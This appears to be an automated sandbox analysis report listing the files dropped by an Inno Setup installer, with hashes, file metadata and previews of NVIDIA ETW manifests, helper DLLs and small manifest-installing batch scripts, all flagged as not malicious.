SHA-256:	3EAFF063360A89395B52681248A64AA2A8ACCA6DA13EAA0194DB004FA2A612C0
SHA-512:	2847C9E4233A5F5A662027D46EE04EB4D79AD937FBDDDC54B16E72547E34414094FF56BC08016FCF31BA5769CFCA2D7849AD3EDEA438C57B34402F1E105852E6
Malicious:	false
Preview:	P)y............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P)y......................................

C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530560980862899
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	945EC37B9971C5E9F26FAFAD6EDFD46E
SHA1:	35AEEEDFAB069194AA41F64DF0E96780C30837B4
SHA-256:	C2E55AA7241DDE41ED9690BD369E62A49D78AD2662C500509FF88FF8342A487F
SHA-512:	283F3E98DEF0B0F249C5B7CB1D6C0DEB6FE922D3D4A68EDF180E791A96F7C18C678E7B4848B5FB03B6C25038BE9850B815B426674A93EA410C430CB261A3F226
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29472
Entropy (8bit):	7.042110181107409
Encrypted:	false
SSDEEP:	768:BD7FEAbd+EDsIOmF+OiR9rikW/F+M9OAriXiRQU:M07sIOYRiPWkWNl9WXil
MD5:	077CB4461A2767383B317EB0C50F5F13
SHA1:	584E64F1D162398B7F377CE55A6B5740379C4282
SHA-256:	8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
SHA-512:	B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Reminder.exe, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse Filename: AX3-GUI-45.exe, Detection: malicious, Browse Filename: Defender_Update_Setup_778795.exe, Detection: malicious, Browse Filename: AX3-GUI-45.exe, Detection: malicious, Browse Filename: Windows7_Activator.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious, Browse Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: Setup_DigiSignerOne_x86.exe, Detection: malicious, Browse Filename: XS_Trade_AI-newest_release_.exe, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse Filename: Reminder.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530560980862899
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	945EC37B9971C5E9F26FAFAD6EDFD46E
SHA1:	35AEEEDFAB069194AA41F64DF0E96780C30837B4
SHA-256:	C2E55AA7241DDE41ED9690BD369E62A49D78AD2662C500509FF88FF8342A487F
SHA-512:	283F3E98DEF0B0F249C5B7CB1D6C0DEB6FE922D3D4A68EDF180E791A96F7C18C678E7B4848B5FB03B6C25038BE9850B815B426674A93EA410C430CB261A3F226
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26664
Entropy (8bit):	5.522130132708777
Encrypted:	false
SSDEEP:	384:K7JTQ85kJnHzfs6h3L9AaI6waxnjgbSHxIYi5Km0f9NfNL1:geHzfsS3xI6lxjmYicm0VND
MD5:	A1632BF8A030FD810D2B716C39297CC5
SHA1:	FE210E233C3218B2224C83CD1D6A985D7C451A38
SHA-256:	30C2F0FC9C37B8A4AF5FE5A946ECF204BDB10FBFB1728FDAB9B00104DAD5AEAC
SHA-512:	C141C3791698FD1F7174D5F5E2D0E7FC8A50815F37835666AE7404E4B6B62F67F907CA94073364374E8CDC1E72FB1413138AFA5708E95CD6309D647774A8C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R.c..R.c.P..R.Rich.R.PE..d...j..c.........." .........@...............................................`............`.......................................................... ...<...........B..(&...........................................................................................rdata..p...........................@..@.rsrc....<... ...>..................@..@....j..c........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...;...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NvFrapsOpenVR.man (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	19387
Entropy (8bit):	4.593621921766137
Encrypted:	false
SSDEEP:	384:LlO4o0Bwx4j7W9RyAKtrlElelyl4lql2lolWlgth0yf1aXgSYC7OcyWod5d7knPS:LtBwq7W9RyAKtrlElelyl4lql2lolWl4
MD5:	990CE7FAE6E9D4DA5B07DA99B8E5C918
SHA1:	571309DF3787B9D80B238E275FC14F6C08581A01
SHA-256:	F52C4DCD61503F74EF1BC7F98CF8BB79963826CCCD35B0EFBFE5E3CAC8D75DD0
SHA-512:	690240495B7D41303D25B60B3DBB668C45C4DD6015F315DB80BA36656EB040A1D59B0D1FEAEC7ECA2AF2FC0C4DBA6BB6504D9B08BBEC40910CFF9EED4294E8DF
Malicious:	false
Preview:	<?xml version="1.0"?>..<instrumentationManifest ...xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd"...xmlns="http://schemas.microsoft.com/win/2004/08/events"...xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:xs="http://www.w3.org/2001/XMLSchema"...xmlns:trace="http://schemas.microsoft.com/win/2004/08/events/trace"...>...<instrumentation>....<events>.....<provider......name="NVFT-ETW-OPENVR"......guid="{B37F4CA5-5507-42CF-B8C7-BABE280601D2}"......symbol="ETW_PROVIDER_NVFT_OPENVR_GUID"......resourceFileName="NvFrapsOpenVREvents.res"......messageFileName="msg"......>......<maps>.......<valueMap name="APIType">........<map.........message="$(string.Map.Unknown)".........value="0"........./> ........<map.........message="$(string.Map.OGL)".........value="1"........./> ........<map.........message="$(string.Map.VK)".........value="2"........./>........<map.........message="$

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29472
Entropy (8bit):	7.042110181107409
Encrypted:	false
SSDEEP:	768:BD7FEAbd+EDsIOmF+OiR9rikW/F+M9OAriXiRQU:M07sIOYRiPWkWNl9WXil
MD5:	077CB4461A2767383B317EB0C50F5F13
SHA1:	584E64F1D162398B7F377CE55A6B5740379C4282
SHA-256:	8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
SHA-512:	B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15400
Entropy (8bit):	6.508481145269509
Encrypted:	false
SSDEEP:	192:pUQl2bzfzEq+1QmZGdIYiYF80CKRZKx7yhDO4NKzYJzkMDxHtFhFYA1FG:mPIjaIYi5Km0hD9NfNzW
MD5:	BA6DFB6F8E350F05B34E97098766A59F
SHA1:	45FD6CF90130123B24431892E61DD2AFFECCA8C5
SHA-256:	75263FC3534A3162B9E44E353B3C2379169787286DF7B65CB4ADC3D8BFBD533C
SHA-512:	ABC703996A2947F36DC393B896FB7D7A3A0630F4CCEC6FF8F5077519B4FDC4A6464222EB653A5AF5B93D03E7BCCD728EB32D0F863532FE00E140B4904CFBB65F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R...R...R.....R...P...R.Rich..R.PE..d......[.........." .........................................................@............`.......................................................... ..................(&...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@.......[........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.xml (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (399), with CRLF line terminators
Category:	dropped
Size (bytes):	11436
Entropy (8bit):	3.5736297585775354
Encrypted:	false
SSDEEP:	96:HEwXjhdOxPUjRPUEvwG5yNq1U6W1ppHrVGtGlGd0pi+o/m/vUjWqkB4BVWeW8vT6:65UjZUhNq1U6mPM+
MD5:	A39215CF85D8B4140CF4ED3E215F87C4
SHA1:	8E6B89FB938F847C02DACF8E767C671D2218727C
SHA-256:	7AA7F8194A0FE5B2A713A610F7C3A22C74E82BFFDB7B13582BC97A8ED23389B7
SHA-512:	2D596634403F5A564314C6CC5D1E6F5A1CE0E9DD3B95502D4F64A2B1D42B3404ADC51AC4F97732EF2A3CD773AD96A3375C7D0BBE05F02AFDA6F5848860965717
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t. .x.s.i.:.s.c.h.e.m.a.L.o.c.a.t.i.o.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s. .e.v.e.n.t.m.a.n...x.s.d.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s.". .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s.". .x.m.l.n.s.:.x.s.i.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.-.i.n.s.t.a.n.c.e.". .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.". .x.m.l.n.s.:.t.r.a.c.e.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.t.r.a.c.e.".>.......<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>.........<.e.v.e.n.t.s.>...........<.p.r.o.v.i.d.e.r. .n.a.m.e.=.".N.V.I.D.I.A.

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\htcvive_install.bat (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.377817544273163
Encrypted:	false
SSDEEP:	12:MLK3diq6GsFA7iXo0CFi7iA5HSyauf67iyauNtDHxm0DHUvZ90DHUvZcO/B8/M4z:MLKvrsFWyrfwrNcJCM4iY
MD5:	537A7DEEE8B9849D6C5A8552AFD2AAB0
SHA1:	DD8BC220365C62F7BAA47F3993552F16251F1D61
SHA-256:	ADFEABFEAEB1376B3E0FABBFE0C3D76D8A62AFA38D016571357ACA37FF2DDEB6
SHA-512:	FA6CD2D876F0E04267CF6C724AA4F342F81797390EB5F5B136F93BD5FB310681E48902177B53A530C007F29093EA8DFFF79A425B7782CE97D6B16E6FF3AF5B84
Malicious:	false
Preview:	REM Any NVFTDLLXX.dll can be used for installing NvFrapsOpenVR.man....set LIBHTCVIVE_EVENTS_MAN=%CD%\NvFrapsOpenVR.man..set LIBHTCVIVE_PATTERN=NVFTVRDLL*.dll....echo Looking for %LIBHTCVIVE_PATTERN% dll's....for /f "delims=" %%a in ('dir /b /o:d "%LIBHTCVIVE_PATTERN%"') do set LIBHTCVIVE_DLL=%%a....icacls "%LIBHTCVIVE_EVENTS_MAN%" /t /grant Everyone:R..icacls "%CD%\%LIBHTCVIVE_PATTERN%" /t /grant Everyone:R....wevtutil uninstall-manifest "%LIBHTCVIVE_EVENTS_MAN%"..echo wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..REM make sure it worked..wevtutil get-publisher NVFT-ETW-OPENVR > nul..if %errorlevel% neq 0 exit /b 1..echo Installed %LIBHTCVIVE_EVENTS_MAN%

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26664
Entropy (8bit):	5.522130132708777
Encrypted:	false
SSDEEP:	384:K7JTQ85kJnHzfs6h3L9AaI6waxnjgbSHxIYi5Km0f9NfNL1:geHzfsS3xI6lxjmYicm0VND
MD5:	A1632BF8A030FD810D2B716C39297CC5
SHA1:	FE210E233C3218B2224C83CD1D6A985D7C451A38
SHA-256:	30C2F0FC9C37B8A4AF5FE5A946ECF204BDB10FBFB1728FDAB9B00104DAD5AEAC
SHA-512:	C141C3791698FD1F7174D5F5E2D0E7FC8A50815F37835666AE7404E4B6B62F67F907CA94073364374E8CDC1E72FB1413138AFA5708E95CD6309D647774A8C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R.c..R.c.P..R.Rich.R.PE..d...j..c.........." .........@...............................................`............`.......................................................... ...<...........B..(&...........................................................................................rdata..p...........................@..@.rsrc....<... ...>..................@..@....j..c........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...;...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-7G1NI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.377817544273163
Encrypted:	false
SSDEEP:	12:MLK3diq6GsFA7iXo0CFi7iA5HSyauf67iyauNtDHxm0DHUvZ90DHUvZcO/B8/M4z:MLKvrsFWyrfwrNcJCM4iY
MD5:	537A7DEEE8B9849D6C5A8552AFD2AAB0
SHA1:	DD8BC220365C62F7BAA47F3993552F16251F1D61
SHA-256:	ADFEABFEAEB1376B3E0FABBFE0C3D76D8A62AFA38D016571357ACA37FF2DDEB6
SHA-512:	FA6CD2D876F0E04267CF6C724AA4F342F81797390EB5F5B136F93BD5FB310681E48902177B53A530C007F29093EA8DFFF79A425B7782CE97D6B16E6FF3AF5B84
Malicious:	false
Preview:	REM Any NVFTDLLXX.dll can be used for installing NvFrapsOpenVR.man....set LIBHTCVIVE_EVENTS_MAN=%CD%\NvFrapsOpenVR.man..set LIBHTCVIVE_PATTERN=NVFTVRDLL*.dll....echo Looking for %LIBHTCVIVE_PATTERN% dll's....for /f "delims=" %%a in ('dir /b /o:d "%LIBHTCVIVE_PATTERN%"') do set LIBHTCVIVE_DLL=%%a....icacls "%LIBHTCVIVE_EVENTS_MAN%" /t /grant Everyone:R..icacls "%CD%\%LIBHTCVIVE_PATTERN%" /t /grant Everyone:R....wevtutil uninstall-manifest "%LIBHTCVIVE_EVENTS_MAN%"..echo wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..REM make sure it worked..wevtutil get-publisher NVFT-ETW-OPENVR > nul..if %errorlevel% neq 0 exit /b 1..echo Installed %LIBHTCVIVE_EVENTS_MAN%

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-8JII1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	19387
Entropy (8bit):	4.593621921766137
Encrypted:	false
SSDEEP:	384:LlO4o0Bwx4j7W9RyAKtrlElelyl4lql2lolWlgth0yf1aXgSYC7OcyWod5d7knPS:LtBwq7W9RyAKtrlElelyl4lql2lolWl4
MD5:	990CE7FAE6E9D4DA5B07DA99B8E5C918
SHA1:	571309DF3787B9D80B238E275FC14F6C08581A01
SHA-256:	F52C4DCD61503F74EF1BC7F98CF8BB79963826CCCD35B0EFBFE5E3CAC8D75DD0
SHA-512:	690240495B7D41303D25B60B3DBB668C45C4DD6015F315DB80BA36656EB040A1D59B0D1FEAEC7ECA2AF2FC0C4DBA6BB6504D9B08BBEC40910CFF9EED4294E8DF
Malicious:	false
Preview:	<?xml version="1.0"?>..<instrumentationManifest ...xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd"...xmlns="http://schemas.microsoft.com/win/2004/08/events"...xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:xs="http://www.w3.org/2001/XMLSchema"...xmlns:trace="http://schemas.microsoft.com/win/2004/08/events/trace"...>...<instrumentation>....<events>.....<provider......name="NVFT-ETW-OPENVR"......guid="{B37F4CA5-5507-42CF-B8C7-BABE280601D2}"......symbol="ETW_PROVIDER_NVFT_OPENVR_GUID"......resourceFileName="NvFrapsOpenVREvents.res"......messageFileName="msg"......>......<maps>.......<valueMap name="APIType">........<map.........message="$(string.Map.Unknown)".........value="0"........./> ........<map.........message="$(string.Map.OGL)".........value="1"........./> ........<map.........message="$(string.Map.VK)".........value="2"........./>........<map.........message="$

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1081896
Entropy (8bit):	6.388045515573479
Encrypted:	false
SSDEEP:	12288:2yreuN4w1fUww+h7w1t3rykcmM/SWzWglboG/mTq3fNuPF67HGC5SYCM:DNBZ/gE3mM/SWWsbT/cq3fNuGGC5SYCM
MD5:	4CB4AA663071A4461290D2CC0AB5407E
SHA1:	96BC4504C025F3D9BD11B3D541401D69CF81126D
SHA-256:	3C7E2F14C47388A84F016408668834D9388C294C791296CAE81DA4581DD1FAFC
SHA-512:	88284D66651A7923D92898C3D4105CB69E5F90AD49BE547C94FA9C5254DDCE3A3626234211FBA7ED5400E671AC8B50D52CEF4EF59203511C27A2A39C202CF83D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ti..5...5...5...S...5...S...5...S..05...k...5...k...5...k...5...S...5...S...5...5...4..-k...5..-k...5...5...5..-k...5..Rich.5..........PE..d...8..c.........."................. ..........@.....................................l....`.................................................P...P........d.......~...\..(&......T.......p...................P...(...`................................................text............................... ..`.rdata...b.......d..................@..@.data........0...@..................@....pdata...~...........V..............@..@.didat..x....`......................@....tls.........p......................@....rsrc....d.......f..................@..@.reloc..T............B..............@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15400
Entropy (8bit):	6.508481145269509
Encrypted:	false
SSDEEP:	192:pUQl2bzfzEq+1QmZGdIYiYF80CKRZKx7yhDO4NKzYJzkMDxHtFhFYA1FG:mPIjaIYi5Km0hD9NfNzW
MD5:	BA6DFB6F8E350F05B34E97098766A59F
SHA1:	45FD6CF90130123B24431892E61DD2AFFECCA8C5
SHA-256:	75263FC3534A3162B9E44E353B3C2379169787286DF7B65CB4ADC3D8BFBD533C
SHA-512:	ABC703996A2947F36DC393B896FB7D7A3A0630F4CCEC6FF8F5077519B4FDC4A6464222EB653A5AF5B93D03E7BCCD728EB32D0F863532FE00E140B4904CFBB65F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R...R...R.....R...P...R.Rich..R.PE..d......[.........." .........................................................@............`.......................................................... ..................(&...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@.......[........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-ML8HU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	553
Entropy (8bit):	4.92146093309903
Encrypted:	false
SSDEEP:	12:wKDwg7qQNLX9H/Qv/KO0zdPKiayeR3HO0zdvS/jFNxH8z:w9qqQNLX9HUUdDUd48z
MD5:	3F1A83F12B3540BBFE8DA771A322D201
SHA1:	747639FEB46633B130D3D0BA54DEFD564D460991
SHA-256:	27F6077CAC271727410E23493E3E2A0F84A0B0BED9A36F6BC48A9FA1E35BD155
SHA-512:	B53950268CD058E4450CD443439DDE84A9EC609DE1B10D77270B0442259F875142FDE6DA17843B1EF95FF91BDD45ACF735BBD44E43E6A50467305339B15D41EF
Malicious:	false
Preview:	@echo off..setlocal..REM Run this script from an admininistrator prompt to install NVIDIA ETW tracing....echo Installing NVIDIA Display Driver ETW Manifest manifest.......REM Uninstall existing manifest first..wevtutil.exe uninstall-manifest "ddETWExternal.xml"....REM Copy the ETW resource to system directory..xcopy /y /f ddETWExternal.dll %WINDIR%\System32\....REM Install the new manifest..wevtutil.exe install-manifest "ddETWExternal.xml"....REM Ensure that the provider was installed successfully..wevtutil get-publisher NVIDIA-DD-External > nul..

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-TP03U.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (399), with CRLF line terminators
Category:	dropped
Size (bytes):	11436
Entropy (8bit):	3.5736297585775354
Encrypted:	false
SSDEEP:	96:HEwXjhdOxPUjRPUEvwG5yNq1U6W1ppHrVGtGlGd0pi+o/m/vUjWqkB4BVWeW8vT6:65UjZUhNq1U6mPM+
MD5:	A39215CF85D8B4140CF4ED3E215F87C4
SHA1:	8E6B89FB938F847C02DACF8E767C671D2218727C
SHA-256:	7AA7F8194A0FE5B2A713A610F7C3A22C74E82BFFDB7B13582BC97A8ED23389B7
SHA-512:	2D596634403F5A564314C6CC5D1E6F5A1CE0E9DD3B95502D4F64A2B1D42B3404ADC51AC4F97732EF2A3CD773AD96A3375C7D0BBE05F02AFDA6F5848860965717
Malicious:	false
